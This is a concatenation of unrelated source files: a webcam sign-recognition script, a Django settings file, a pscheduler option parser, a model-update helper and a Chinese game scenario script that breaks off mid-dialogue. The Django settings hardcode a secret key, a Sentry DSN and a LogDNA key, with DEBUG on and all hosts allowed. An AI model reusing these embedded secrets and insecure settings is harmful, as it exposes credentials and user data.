if __name__ == "__main__":
vs = Main("/home/uwe/com.grobbles.app.gridflow4")
|
from keras.models import model_from_json
import operator
import cv2
json_file = open("model-bw.json", "r")
model_json = json_file.read()
json_file.close()
loaded_model = model_from_json(model_json)
loaded_model.load_weights("model-bw.h5")
print("Loaded model from disk")
cap = cv2.VideoCapture(0)
categories = {0: 'ZERO',
1: 'ONE',
2: 'TWO',
3: 'THREE',
4: 'FOUR',
5: 'FIVE',
6: "SIX",
7: "SEVEN",
8: "EIGHT",
9: "NINE",
'A': "A",
'B': "B",
'C': "C",
'D': "D",
'E': "E",
'F': "F",
'G': "G",
'H': "H",
'I': "I",
'J': "J",
'K': "K",
'L': "L",
'M': "M",
'N': "N",
'O': "O",
'P': "P",
'Q': "Q",
'R': "R",
'S': "S",
'T': "T",
'U': "U",
'V': "V",
'W': "W",
'X': "X",
'Y': "Y",
'Z': "Z"
}
while True:
_, frame = cap.read()
frame = cv2.flip(frame, 1)
x1 = int(0.7*frame.shape[1])
y1 = 100
x2 = frame.shape[1]-10
y2 = int(0.5*frame.shape[1])
cv2.rectangle(frame, (x1-1, y1-1), (x2+1, y2+1), (255,0,0) ,1)
thresh = frame[y1:y2, x1:x2]
thresh = cv2.resize(thresh, (64, 64))
thresh = cv2.cvtColor(thresh, cv2.COLOR_BGR2GRAY)
_, test_image = cv2.threshold(thresh, 120, 255, cv2.THRESH_BINARY)
cv2.imshow("test", test_image)
result = loaded_model.predict(test_image.reshape(1, 64, 64, 1))
prediction = {'ZERO': result[0][0],
'ONE': result[0][1],
'TWO': result[0][2],
'THREE': result[0][3],
'FOUR': result[0][4],
'FIVE': result[0][5],
'SIX': result[0][6],
'SEVEN': result[0][7],
'EIGHT': result[0][8],
'NINE': result[0][9],
'A': result[0][10],
'B': result[0][11],
'C': result[0][12],
'D': result[0][13],
'E': result[0][14],
'F': result[0][15],
'G': result[0][16],
'H': result[0][17],
'I': result[0][18],
'J': result[0][19],
'K': result[0][20],
'L': result[0][21],
'M': result[0][22],
'N': result[0][23],
'O': result[0][24],
'P': result[0][25],
'Q': result[0][26],
'R': result[0][27],
'S': result[0][28],
'T': result[0][29],
'U': result[0][30],
'V': result[0][31],
'W': result[0][32],
'X': result[0][33],
'Y': result[0][34],
'Z': result[0][35],
}
prediction = sorted(prediction.items(), key=operator.itemgetter(1), reverse=True)
cv2.putText(frame, prediction[0][0], (500, 70), cv2.FONT_HERSHEY_PLAIN, 1, (255,0,0), 1)
cv2.imshow("Frame", frame)
interrupt = cv2.waitKey(10)
if interrupt & 0xFF == 27:
break
cap.release()
cv2.destroyAllWindows()
|
import sentry_sdk
from sentry_sdk.integrations.celery import CeleryIntegration
from sentry_sdk.integrations.django import DjangoIntegration
import os
import logging
from logdna import LogDNAHandler
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '(14f_d6lne@(mqpw^^(&tovbol12b&tkxxouaxmr%&s&p^00d!'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'chat',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'users',
'django_extensions',
'channels',
'django_elasticsearch_dsl',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'config.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'config.wsgi.application'
ASGI_APPLICATION = "config.routing.application"
ELASTICSEARCH_DSL = {
'default': {
'hosts': 'localhost:9200'
},
}
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
sentry_sdk.init(
dsn="https://100cf029a2bc407d9d0ade68aad0a203@o427990.ingest.sentry.io/5372863",
integrations=[DjangoIntegration(), CeleryIntegration()],
send_default_pii=True
)
# CACHES = {
# "default": {
# "BACKEND": "django_redis.cache.RedisCache",
# "LOCATION": "redis://127.0.0.1:6379/1",
# "OPTIONS": {
# "CLIENT_CLASS": "django_redis.client.DefaultClient",
# }
# }
# }
CACHES = {
'default': {
'BACKEND': 'redis_cache.RedisCache',
'LOCATION': 'localhost:6379',
},
}
LOGGING = {
# Other logging settings...
'version': 1,
'handlers': {
'logdna': {
'level': logging.DEBUG,
'class': 'logging.handlers.LogDNAHandler',
'key': 'b4f5b376585199181e9f3942cbb87b3f',
},
'console': {
'level': 'INFO',
'class': 'logging.StreamHandler',
},
# 'file': {
# 'level': 'DEBUG',
# 'class': 'logging.FileHandler',
# 'filename': 'debug.log',
# },
},
'loggers': {
'django': {
'handlers': ['logdna', 'console'],
'level': logging.DEBUG
},
'users': {
'handlers': ['logdna', 'console'],
'level': logging.INFO
}
},
}
|
#!/usr/bin/env python3
#
# Convert comamnd-line options to a test specification
import optparse
import pscheduler
import sys
if len(sys.argv) > 1:
# Args are on the command line
args = sys.argv[1:]
else:
# Args are in a JSON array on stdin
json_args = pscheduler.json_load(exit_on_error=True)
args = []
if not isinstance(json_args,list):
pscheduler.fail("Invalid JSON for this operation")
for arg in json_args:
if not ( isinstance(arg, str)
or isinstance(arg, int)
or isinstance(arg, float) ):
pscheduler.fail("Invalid JSON for this operation")
args = [ str(arg) for arg in json_args ]
# Gargle the arguments
opt_parser = pscheduler.FailingOptionParser(epilog=
"""Examples:
task idlebg --duration PT1M15S
Do nothing locally for one minute and 15 seconds
task idlebg --duration PT20S --host ps2.example.org
Make ps2.example.org be idle for 20 seconds
task idlebg --duration PT20S --starting-comment "Let's get lazy."
Emit a custom comment before idling
task idlebg --duration PT20S --parting-comment "I got nothing done."
Emit a custom comment after idling
"""
)
opt_parser.add_option("-d", "--duration",
help="Idle duration (ISO8601)",
action="store", type="string",
dest="duration")
# The short version is capitalized because -h is for help.
opt_parser.add_option("-H", "--host",
help="Host which should be idle",
action="store", type="string",
dest="host")
opt_parser.add_option("-i", "--interval",
help="Result interval (ISO8601)",
action="store", type="string",
dest="interval")
opt_parser.add_option("-s", "--starting-comment",
help="Starting comment",
action="store", type="string",
dest="starting_comment")
opt_parser.add_option("-p", "--parting-comment",
help="Parting comment",
action="store", type="string",
dest="parting_comment")
(options, remaining_args) = opt_parser.parse_args(args)
if len(remaining_args) != 0:
pscheduler.fail("Unusable arguments: %s" % " ".join(remaining_args))
result = { 'schema': 1 }
if options.duration is not None:
result['duration'] = options.duration
if options.host is not None:
result['host'] = options.host
if options.interval is not None:
result['interval'] = options.interval
if options.starting_comment is not None:
result['starting-comment'] = options.starting_comment
if options.parting_comment is not None:
result['parting-comment'] = options.parting_comment
pscheduler.succeed_json(result)
|
#-*- coding:utf8 -*-
def update_model_fields(obj,update_fields=[]):
"""
根据给定字段,保存该对象的对应字段信息
"""
field_entry = {}
for k in update_fields:
if hasattr(obj,k) :
field_entry[k] = getattr(obj,k)
rows = obj.__class__.objects.filter(pk=obj.pk).update(**field_entry)
return rows |
from ED6ScenarioHelper import *
def main():
# 洛连特市 钟楼
CreateScenaFile(
FileName = 'T0133 ._SN',
MapName = 'Rolent',
Location = 'T0133.x',
MapIndex = 10,
MapDefaultBGM = "ed60010",
Flags = 0,
EntryFunctionIndex = 0xFFFF,
Reserved = 0,
IncludedScenario = [
'',
'',
'',
'',
'',
'',
'',
''
],
)
BuildStringList(
'@FileName', # 8
'潘杜爷爷', # 9
'艾娅莉', # 10
'阿鲁姆', # 11
)
DeclEntryPoint(
Unknown_00 = 6000,
Unknown_04 = 0,
Unknown_08 = 184000,
Unknown_0C = 4,
Unknown_0E = 270,
Unknown_10 = 0,
Unknown_14 = 8000,
Unknown_18 = -10000,
Unknown_1C = 0,
Unknown_20 = 0,
Unknown_24 = 0,
Unknown_28 = 2600,
Unknown_2C = 262,
Unknown_30 = 315,
Unknown_32 = 0,
Unknown_34 = 360,
Unknown_36 = 0,
Unknown_38 = 0,
Unknown_3A = 10,
InitScenaIndex = 0,
InitFunctionIndex = 0,
EntryScenaIndex = 0,
EntryFunctionIndex = 1,
)
AddCharChip(
'ED6_DT07/CH01250 ._CH', # 00
'ED6_DT07/CH01150 ._CH', # 01
'ED6_DT07/CH01140 ._CH', # 02
)
AddCharChipPat(
'ED6_DT07/CH01250P._CP', # 00
'ED6_DT07/CH01150P._CP', # 01
'ED6_DT07/CH01140P._CP', # 02
)
DeclNpc(
X = 3275,
Z = 0,
Y = 2522,
Direction = 180,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 3,
TalkFunctionIndex = 0,
TalkScenaIndex = 4,
)
DeclNpc(
X = 54174,
Z = 10300,
Y = 44126,
Direction = 180,
Unknown2 = 0,
Unknown3 = 1,
ChipIndex = 0x1,
NpcIndex = 0x181,
InitFunctionIndex = 0,
InitScenaIndex = 3,
TalkFunctionIndex = 0,
TalkScenaIndex = 5,
)
DeclNpc(
X = 54904,
Z = 10300,
Y = 44125,
Direction = 180,
Unknown2 = 0,
Unknown3 = 2,
ChipIndex = 0x2,
NpcIndex = 0x181,
InitFunctionIndex = 0,
InitScenaIndex = 3,
TalkFunctionIndex = 0,
TalkScenaIndex = 6,
)
DeclActor(
TriggerX = -300,
TriggerZ = 0,
TriggerY = 4140,
TriggerRange = 800,
ActorX = -300,
ActorZ = 1000,
ActorY = 4140,
Flags = 0x7C,
TalkScenaIndex = 0,
TalkFunctionIndex = 7,
Unknown_22 = 0,
)
DeclActor(
TriggerX = 53450,
TriggerZ = 10300,
TriggerY = 47970,
TriggerRange = 800,
ActorX = 53450,
ActorZ = 10000,
ActorY = 47970,
Flags = 0x7C,
TalkScenaIndex = 0,
TalkFunctionIndex = 8,
Unknown_22 = 0,
)
ScpFunction(
"Function_0_16A", # 00, 0
"Function_1_1E2", # 01, 1
"Function_2_204", # 02, 2
"Function_3_205", # 03, 3
"Function_4_21B", # 04, 4
"Function_5_B46", # 05, 5
"Function_6_D79", # 06, 6
"Function_7_F29", # 07, 7
"Function_8_10C7", # 08, 8
"Function_9_10D1", # 09, 9
"Function_10_2161", # 0A, 10
"Function_11_21E4", # 0B, 11
)
def Function_0_16A(): pass
label("Function_0_16A")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x4D, 0)), scpexpr(EXPR_END)), "loc_17E")
SetChrFlags(0x8, 0x80)
SetChrFlags(0x8, 0x8)
Jump("loc_1D3")
label("loc_17E")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x49, 7)), scpexpr(EXPR_END)), "loc_188")
Jump("loc_1D3")
label("loc_188")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x47, 1)), scpexpr(EXPR_END)), "loc_19C")
SetChrFlags(0x8, 0x80)
SetChrFlags(0x8, 0x8)
Jump("loc_1D3")
label("loc_19C")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x42, 3)), scpexpr(EXPR_END)), "loc_1A6")
Jump("loc_1D3")
label("loc_1A6")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x42, 2)), scpexpr(EXPR_END)), "loc_1C4")
ClearChrFlags(0x9, 0x80)
ClearChrFlags(0xA, 0x80)
SetChrFlags(0x8, 0x80)
SetChrFlags(0x8, 0x8)
Jump("loc_1D3")
label("loc_1C4")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x40, 5)), scpexpr(EXPR_END)), "loc_1CE")
Jump("loc_1D3")
label("loc_1CE")
SetChrFlags(0x8, 0x10)
label("loc_1D3")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x7F, 2)), scpexpr(EXPR_END)), "loc_1E1")
OP_A3(0x3FA)
Event(0, 9)
label("loc_1E1")
Return()
# Function_0_16A end
def Function_1_1E2(): pass
label("Function_1_1E2")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x42, 3)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x42, 2)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_1FA")
OP_B1("t0133_y")
Jump("loc_203")
label("loc_1FA")
OP_B1("t0133_n")
label("loc_203")
Return()
# Function_1_1E2 end
def Function_2_204(): pass
label("Function_2_204")
Return()
# Function_2_204 end
def Function_3_205(): pass
label("Function_3_205")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_21A")
OP_99(0xFE, 0x0, 0x7, 0x5DC)
Jump("Function_3_205")
label("loc_21A")
Return()
# Function_3_205 end
def Function_4_21B(): pass
label("Function_4_21B")
TalkBegin(0x8)
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x4B, 1)), scpexpr(EXPR_END)), "loc_3FC")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_36F")
OP_A2(0x0)
ChrTalk(
0xFE,
(
"每天从塔顶向外眺望,\x01",
"真是让人很开心呀。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xFE,
(
"季节的变化,\x01",
"城镇里人们的生活……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xFE,
(
"每天都会发生\x01",
"各种各样的变化。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xFE,
(
"最近经常在街上看到\x01",
"布露姆老太太。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xFE,
(
"呵呵,\x01",
"她要去干什么呢?\x02",
)
)
CloseMessageWindow()
Jump("loc_3F9")
label("loc_36F")
ChrTalk(
0xFE,
(
"每天从塔顶向外眺望,\x01",
"真是让人很开心呀。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xFE,
(
"每天都会发生\x01",
"各种各样的变化。\x02",
)
)
CloseMessageWindow()
label("loc_3F9")
Jump("loc_B42")
label("loc_3FC")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x49, 7)), scpexpr(EXPR_END)), "loc_541")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_4F1")
OP_A2(0x0)
ChrTalk(
0xFE,
(
"战争结束,修复钟楼的时候,\x01",
"梅尔达斯的儿子\x01",
"把大钟改成了导力驱动式。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xFE,
(
"我能摆弄的部分越来越少了,\x01",
"真是感到有些寂寞啊……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xFE,
(
"呵呵,\x01",
"这也是时代的变迁呀。\x02",
)
)
CloseMessageWindow()
Jump("loc_53E")
label("loc_4F1")
ChrTalk(
0xFE,
(
"战争结束,修复钟楼的时候,\x01",
"梅尔达斯的儿子\x01",
"把大钟改成了导力驱动式。\x02",
)
)
CloseMessageWindow()
label("loc_53E")
Jump("loc_B42")
label("loc_541")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x42, 3)), scpexpr(EXPR_END)), "loc_648")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_5F3")
OP_A2(0x0)
ChrTalk(
0xFE,
(
"那么,\x01",
"开始今天的检查吧。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xFE,
(
"这个塔是洛连特的象征,\x01",
"代表了洛连特的历史,\x01",
"而且也是我的骄傲呀。\x02",
)
)
CloseMessageWindow()
Jump("loc_645")
label("loc_5F3")
ChrTalk(
0xFE,
(
"这个塔是洛连特的象征,\x01",
"代表了洛连特的历史,\x01",
"而且也是我的骄傲呀。\x02",
)
)
CloseMessageWindow()
label("loc_645")
Jump("loc_B42")
label("loc_648")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x42, 2)), scpexpr(EXPR_END)), "loc_7AF")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_725")
OP_A2(0x0)
ChrTalk(
0x8,
(
"一天又过去了, \x01",
"和平的日子实在是比什么都好啊。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
"一想起十年前的那次战争我就忍不住颤抖。\x02",
)
CloseMessageWindow()
ChrTalk(
0x8,
"战争什么的……不要再发生了。\x02",
)
CloseMessageWindow()
Jump("loc_7AC")
label("loc_725")
ChrTalk(
0x8,
"一想起十年前的那次战争我就忍不住颤抖。\x02",
)
CloseMessageWindow()
ChrTalk(
0x8,
"战争什么的……不要再发生了。\x02",
)
CloseMessageWindow()
label("loc_7AC")
Jump("loc_B42")
label("loc_7AF")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x40, 5)), scpexpr(EXPR_END)), "loc_8BE")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_865")
OP_A2(0x0)
ChrTalk(
0x8,
(
"还是老样子,\x01",
"钟声依旧那么动听。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"我呀,\x01",
"最喜欢听这个塔的钟声呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"这个钟不仅仅\x01",
"只有报时的作用哦。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"它还铭刻着\x01",
"洛连特的历史呢。\x02",
)
)
CloseMessageWindow()
Jump("loc_8BB")
label("loc_865")
ChrTalk(
0x8,
(
"这个钟不仅仅\x01",
"只有报时的作用哦。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"它还铭刻着\x01",
"洛连特的历史呢。\x02",
)
)
CloseMessageWindow()
label("loc_8BB")
Jump("loc_B42")
label("loc_8BE")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_ABC")
OP_A2(0x0)
ChrTalk(
0x101,
"#001F潘杜爷爷!\x02",
)
CloseMessageWindow()
OP_62(0x8, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
Sleep(1000)
TurnDirection(0xFE, 0x101, 400)
ChrTalk(
0x8,
"嗯?这个声音是……\x02",
)
CloseMessageWindow()
OP_62(0x8, 0x0, 2000, 0x26, 0x27, 0xFA, 0x2)
Sleep(500)
ChrTalk(
0x8,
"……呵呵呵呵!\x02",
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"我还以为是谁呢,\x01",
"这不是卡西乌斯家的\x01",
"调皮姑娘和听话小子吗。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"最近你们好久都\x01",
"没有到这里来玩了呢,\x01",
"这段时间很忙吗?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F潘杜爷爷还是一直都在这里守着的吗?\x01",
" \x02",
)
)
CloseMessageWindow()
TurnDirection(0xFE, 0x102, 400)
ChrTalk(
0x8,
(
"这里就像\x01",
"我的家一样啊。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"我会一直守着这个钟楼,\x01",
"至死方休。\x02",
)
)
CloseMessageWindow()
Jump("loc_B42")
label("loc_ABC")
TurnDirection(0xFE, 0x101, 0)
ChrTalk(
0x8,
(
"这里就像\x01",
"我的家一样啊。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"我会一直守着这个钟楼,\x01",
"至死方休。\x02",
)
)
CloseMessageWindow()
label("loc_B42")
TalkEnd(0x8)
Return()
# Function_4_21B end
def Function_5_B46(): pass
label("Function_5_B46")
TalkBegin(0x9)
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 1)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_D31")
OP_A2(0x1)
ChrTalk(
0x9,
(
"星星开始闪烁的时候,\x01",
"他在塔上这么和我说的呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x9,
"可以和我交往吗……\x02",
)
CloseMessageWindow()
OP_62(0x9, 0x0, 2000, 0xA, 0xB, 0xFA, 0x2)
OP_22(0xF, 0x0, 0x64)
Sleep(1000)
ChrTalk(
0x9,
"哎呀㈱\x02",
)
CloseMessageWindow()
ChrTalk(
0x9,
(
"这就是我\x01",
"梦寐以求的场景啊!\x02",
)
)
CloseMessageWindow()
OP_8C(0x9, 180, 500)
ChrTalk(
0x101,
(
"#501F(唔,\x01",
" 的确是一个相当不错的地方……)\x02\x03",
"#501F(为了听这句话\x01",
" 两个人特意跑上这里来?)\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F(呵呵……\x01",
" 这要看当事人是怎么想的了。)\x02",
)
)
CloseMessageWindow()
Jump("loc_D75")
label("loc_D31")
ChrTalk(
0x9,
"呵呵……\x02",
)
CloseMessageWindow()
ChrTalk(
0x9,
"好·幸·福·呢㈱\x02",
)
CloseMessageWindow()
OP_62(0x9, 0x0, 2000, 0xA, 0xB, 0xFA, 0x2)
OP_22(0xF, 0x0, 0x64)
Sleep(1000)
label("loc_D75")
TalkEnd(0x9)
Return()
# Function_5_B46 end
def Function_6_D79(): pass
label("Function_6_D79")
TalkBegin(0xA)
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_ED1")
OP_A2(0x2)
ChrTalk(
0xA,
"#4S成功了!#3S\x02",
)
CloseMessageWindow()
ChrTalk(
0xA,
"听我说!\x02",
)
CloseMessageWindow()
ChrTalk(
0xA,
(
"她终于答应\x01",
"和我交往了啊!\x02",
)
)
CloseMessageWindow()
OP_8C(0xA, 180, 500)
OP_62(0xA, 0x0, 2000, 0xA, 0xB, 0xFA, 0x2)
OP_22(0xF, 0x0, 0x64)
Sleep(1000)
ChrTalk(
0xA,
(
"啊啊,女神大人……\x01",
"一整天所做的努力终于没有白费啊。\x02",
)
)
CloseMessageWindow()
OP_62(0x101, 0x0, 2000, 0x10, 0x13, 0xFA, 0x1)
OP_22(0x31, 0x0, 0x64)
Sleep(1000)
ChrTalk(
0x101,
"#501F(一、一整天……)\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
"#010F(真是坚持不懈换来的胜利呢。)\x02",
)
CloseMessageWindow()
Jump("loc_F25")
label("loc_ED1")
ChrTalk(
0xA,
(
"啊啊,女神大人……\x01",
"一整天所做的努力终于没有白费啊。\x02",
)
)
CloseMessageWindow()
label("loc_F25")
TalkEnd(0xA)
Return()
# Function_6_D79 end
def Function_7_F29(): pass
label("Function_7_F29")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x4D, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x72, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_10BD")
EventBegin(0x0)
OP_A2(0x26A)
FadeToDark(300, 0, 100)
SetMessageWindowPos(72, 320, 56, 3)
SetChrName("")
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"这里有架梯子可以通到上面的瞭望台去。\x07\x00\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
SetMessageWindowPos(72, 320, 56, 3)
FadeToBright(300, 0)
ChrTalk(
0x101,
"#003F…………………………\x02",
)
CloseMessageWindow()
OP_62(0x102, 0x0, 2000, 0x26, 0x26, 0xFA, 0x1)
Sleep(1000)
TurnDirection(0x102, 0x101, 400)
ChrTalk(
0x102,
(
"#014F哟,怎么了?\x01",
"突然愣着不动。\x02",
)
)
CloseMessageWindow()
OP_62(0x101, 0x0, 2000, 0x28, 0x2B, 0x64, 0x3)
TurnDirection(0x101, 0x102, 400)
ChrTalk(
0x101,
(
"#506F啊……唔唔,没什么!\x02\x03",
"#006F对了,我们也上瞭望台看看吧。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
"#014F唔……?\x02",
)
CloseMessageWindow()
Jc((scpexpr(EXPR_EXEC_OP, "OP_42(0x2)"), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_NEG), scpexpr(EXPR_NEQ), scpexpr(EXPR_END)), "loc_10AC")
ChrTalk(
0x103,
"#522F…………………………\x02",
)
CloseMessageWindow()
label("loc_10AC")
Sleep(100)
NewScene("ED6_DT01/T0133 ._SN", 103, 0, 0)
IdleLoop()
Jump("loc_10C6")
label("loc_10BD")
NewScene("ED6_DT01/T0133 ._SN", 103, 0, 0)
IdleLoop()
label("loc_10C6")
Return()
# Function_7_F29 end
def Function_8_10C7(): pass
label("Function_8_10C7")
NewScene("ED6_DT01/T0133 ._SN", 102, 0, 0)
IdleLoop()
Return()
# Function_8_10C7 end
def Function_9_10D1(): pass
label("Function_9_10D1")
ClearMapFlags(0x1)
EventBegin(0x0)
SetChrPos(0x101, 54192, 10300, 44126, 180)
SetChrPos(0x102, 55561, 10300, 44126, 180)
SetMapFlags(0x10)
FadeToBright(4000, 0)
OP_6D(54670, 10300, 44190, 0)
OP_6C(330000, 0)
OP_67(0, 8300, -10000, 0)
OP_6B(1560, 0)
OP_6E(457, 0)
def lambda_114B():
OP_6D(54190, 10300, 41950, 6000)
ExitThread()
QueueWorkItem(0x0, 1, lambda_114B)
def lambda_1163():
OP_6C(302000, 6000)
ExitThread()
QueueWorkItem(0x0, 2, lambda_1163)
def lambda_1173():
OP_6E(539, 6000)
ExitThread()
QueueWorkItem(0x0, 3, lambda_1173)
def lambda_1183():
OP_67(0, 7060, -10000, 6000)
ExitThread()
QueueWorkItem(0x0, 0, lambda_1183)
Sleep(6500)
Fade(1500)
OP_6D(54620, 10300, 44190, 0)
OP_67(0, 6690, -10000, 0)
OP_6B(1660, 0)
OP_6C(225000, 0)
OP_6E(476, 0)
SetChrPos(0x101, 53950, 10300, 44150, 180)
SetChrPos(0x102, 55250, 10300, 44150, 180)
Sleep(2000)
ChrTalk(
0x101,
(
"#501F#2P哈啊~\x01",
"早上的空气真是清新……\x02",
)
)
CloseMessageWindow()
TurnDirection(0x101, 0x102, 400)
ChrTalk(
0x101,
(
"#001F#2P看啊,约修亚。\x01",
"从这里能看到咱们家呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
"#019F#6P真的,能看到屋顶呢。\x02",
)
CloseMessageWindow()
TurnDirection(0x102, 0x101, 400)
ChrTalk(
0x102,
(
"#010F#6P不过,\x01",
"平常你都不想来这里的,\x01",
"今天这是吹的什么风啊?\x02\x03",
"我本来以为\x01",
"你不喜欢这个地方呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#003F#2P……………………………\x02",
)
CloseMessageWindow()
def lambda_1368():
OP_6E(450, 3000)
ExitThread()
QueueWorkItem(0x0, 1, lambda_1368)
OP_20(0x7D0)
Sleep(1000)
OP_8C(0x101, 180, 300)
OP_21()
OP_1D(0x53)
Sleep(1000)
ChrTalk(
0x101,
(
"#000F#2P我喜欢这个地方啊。\x01",
"不过,我不会随便来这里的。\x02\x03",
"#500F这是我妈妈……\x01",
"去世的地方。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
"#014F#6P……哎………\x02",
)
CloseMessageWindow()
FadeToDark(2000, 0, -1)
OP_0D()
OP_AD(0x40019, 0x0, 0x0, 0x64)
Sleep(3000)
SetMessageWindowPos(72, 320, 56, 3)
SetChrName("艾丝蒂尔")
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0xC),
"10年前战争的时候……\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
"包围洛连特的帝国军队\x01",
"为了迫使这里的市民投降,\x01",
"而向作为城市象征的钟楼开炮。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
"那个时候,\x01",
"爸爸作为王国军的军人参加了战斗……\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
